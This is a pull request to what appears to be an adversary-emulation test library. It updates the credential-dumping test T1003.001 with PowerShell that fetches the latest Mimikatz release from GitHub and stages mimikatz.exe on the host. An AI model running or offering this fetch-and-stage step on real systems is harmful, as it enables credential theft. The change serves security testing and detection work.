### PR TITLE
Updated Offline Cred Theft With Mimikatz

### DIFF
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -181,8 +181,15 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
+      $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
+      $request = [System.Net.WebRequest]::Create($url)
+      $response = $request.GetResponse()
+      $realTagUrl = $response.ResponseUri.OriginalString
+      $version = $realTagUrl.split('/')[-1]
+      $fileName = 'mimikatz_trunk.zip'
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+      $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
+      Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
       Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
       New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
       Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force


### PR DESCRIPTION
Updated the command segment related to guid: 453acf13-1dbd-47d7-b28a-172ce9228023
**Details:**
Existing request URL doesn't exist in gentilkiwi's repo. Added code segment will obtain the latest mimikatz_trunk.zip from the repo I've repurposed the code segment done by Xiang ZHU (https://copdips.com/2019/12/Using-Powershell-to-retrieve-latest-package-url-from-github-releases.html) to provide a lasting solution for this.

**Testing:**
Tested using local Invoke-AtomicTest and it worked.

**Associated Issues:**
N/A